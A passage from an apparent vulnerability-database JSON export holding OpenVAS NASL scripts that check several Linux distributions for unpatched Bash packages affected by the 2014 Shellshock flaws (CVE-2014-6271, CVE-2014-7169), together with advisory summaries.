rpm:\"bash~4.2.51~2.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:18", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2014-3076", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123300", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123300", "title": "Oracle Linux Local Check: ELSA-2014-3076", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3076.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123300\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:01:58 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3076\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3076 - bash security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3076\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3076.html\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.45~5.el7_0.2.0.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2.45~5.el7_0.2.0.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:47", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-10-01T00:00:00", "id": "OPENVAS:1361412562310841987", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841987", "title": "Ubuntu Update for bash USN-2363-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2363_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for bash USN-2363-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841987\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:57:38 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for bash USN-2363-1\");\n script_tag(name:\"insight\", value:\"Tavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. (CVE-2014-7169)\");\n script_tag(name:\"affected\", value:\"bash on Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"USN\", value:\"2363-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2363-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|10\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.3-7ubuntu1.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2-2ubuntu2.3\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.1-2ubuntu3.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:43", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-10-01T00:00:00", "id": "OPENVAS:1361412562310841986", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841986", "title": "Ubuntu Update for bash USN-2363-2", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2363_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for bash USN-2363-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841986\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 17:00:26 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for bash USN-2363-2\");\n script_tag(name:\"insight\", value:\"USN-2363-1 fixed a vulnerability in Bash. Due to a build issue, the patch\nfor CVE-2014-7169 didn't get properly applied in the Ubuntu 14.04 LTS\npackage. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nTavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. (CVE-2014-7169)\");\n script_tag(name:\"affected\", value:\"bash on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"USN\", value:\"2363-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2363-2/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.3-7ubuntu1.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:44", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2014-3075", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123302", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123302", "title": "Oracle Linux Local Check: ELSA-2014-3075", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3075.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123302\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:01:59 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3075\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3075 - bash security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3075\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3075.html\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.el6_5.1.0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.1.2~15.el6_5.1.0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:55", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2014-3077", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123301", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123301", "title": "Oracle Linux Local Check: ELSA-2014-3077", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3077.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123301\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:01:58 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3077\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3077 - bash security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3077\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3077.html\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5.1.0.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:26", "bulletinFamily": "scanner", "description": "Gentoo Linux Local Security Checks GLSA 201409-10", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121273", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121273", "title": "Gentoo Security Advisory GLSA 201409-10", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201409-10.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121273\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:55 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201409-10\");\n script_tag(name:\"insight\", value:\"Stephane Chazelas reported that Bash incorrectly handles function definitions, allowing attackers to inject arbitrary code (CVE-2014-6271). Gentoo Linux informed about this issue in GLSA 201409-09.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201409-10\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201409-10\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 3.1_p18-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 3.2_p52-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.0_p39-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.1_p12-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.2_p48-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(), vulnerable: make_list(\"lt 4.2_p48-r1\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:47", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-10-01T00:00:00", "id": "OPENVAS:1361412562310882032", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882032", "title": "CentOS Update for bash CESA-2014:1306 centos7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bash CESA-2014:1306 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882032\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:59:55 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for bash CESA-2014:1306 centos7\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. For more information see the Knowledgebase article at the linked references.\n\nNote: Docker users are advised to use 'yum update' within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"CESA\", value:\"2014:1306\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-September/020592.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.45~5.el7_0.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2.45~5.el7_0.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:32", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-10-01T00:00:00", "id": "OPENVAS:1361412562310882033", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882033", "title": "CentOS Update for bash CESA-2014:1306 centos5", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bash CESA-2014:1306 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882033\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 17:00:17 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for bash CESA-2014:1306 centos5\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. For more information see the Knowledgebase article at the linked references.\n\nNote: Docker users are advised to use 'yum update' within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"CESA\", value:\"2014:1306\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-September/020591.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 